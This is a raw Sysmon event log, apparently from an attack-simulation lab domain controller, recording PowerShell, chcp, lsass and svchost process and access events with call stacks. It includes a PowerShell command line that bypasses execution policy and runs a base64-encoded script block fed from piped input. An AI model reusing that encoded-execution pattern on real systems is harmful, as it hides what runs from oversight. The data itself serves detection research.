13:08:45.731{08A6967A-425D-6000-D502-000000009901}49324428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425D-6000-D602-000000009901}4048C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4e49767b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d938285|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d937f56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4e3e983b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d8f8aec|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d956fbb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d93a620|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d93a620|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d93a4b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d92c436|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d938969|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d93855c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d938285|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d937f56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4e3e983b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d91edb7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+4d91e387 154100x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.741{08A6967A-425D-6000-D602-000000009901}4048C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425D-6000-7315-110000000000}0x1115730HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.668{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.668{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.637{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pvqruwnt.a25.ps12021-01-14 13:08:45.637 10341000x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.621{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-425D-6000-D202-000000009901}45722460C:\Windows\system32\conhost.exe{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.590{08A6967A-425D-6000-D402-000000009901}26124860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d52255d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c3167(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c2e38(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d47471d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9839ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9e1e9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c5502(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c5502(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c5393(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9b7318(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c384b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c343e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c3167(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9c2e38(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d47471d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9a9c99(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c9a9269(wow64) 154100x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.595{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425D-6000-7315-110000000000}0x1115730HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 